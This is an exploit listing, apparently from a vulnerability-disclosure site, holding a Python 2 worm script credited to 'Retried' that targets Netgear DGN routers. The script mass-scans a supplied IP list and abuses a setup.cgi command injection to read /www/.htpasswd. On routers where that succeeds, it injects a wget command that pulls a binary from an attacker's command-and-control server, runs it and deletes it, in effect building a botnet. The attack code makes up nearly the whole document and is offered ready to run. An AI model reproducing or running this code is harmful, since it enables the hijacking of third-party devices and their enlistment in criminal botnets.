DGN V2 (Remote Command Injector)

2020.07.23
us retried (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Made By Retried # Instagram: @retried # nano /usr/include/bits/typesizes.h -> change 1024 to 99999 # ulimit -n 1000000 import threading, random, socket, time, sys, urllib2 blacklisted = ["127.0","10.0","192.168"] ports = [5000, 80, 8080, 8000, 8888, 8443] if len(sys.argv) < 2: sys.exit("Usage: python " + sys.argv[0] + " <ip-list> <cnc-ip>") print "Check out @retried on instagram for more shit..." server_ip = sys.argv[2] def infect(ip): global ports global blacklisted try: thisipisbad='no' for badip in blacklisted: if badip in ip: thisipisbad='yes' if thisipisbad=='yes': sys.exit() for port in ports: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) s.connect((ip, port)) s.close() ppport = port except: pass dobreak=False if ppport != 8080: rs = urllib2.urlopen("http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1") else: rs = urllib2.urlopen("http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1") time.sleep(1) if "admin:" in rs.read(): badserver=False else: sys.exit() badserver=False if badserver == False: print "Retried is Infecting " + ip if ppport != 8080: url = "http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1" else: url = "http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/&currentsetting.htm=1" rs = urllib2.urlopen(url, timeout=5) time.sleep(1) except Exception as e: pass vulns = open(sys.argv[1], "r").readlines() x = 0 for line in vulns: try: line = line.replace("\n", "") if x > 50: time.sleep(1) x = 0 t = threading.Thread(target=infect, args=(line,)) t.start() x += 1 except Exception as e: pass print "Done"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top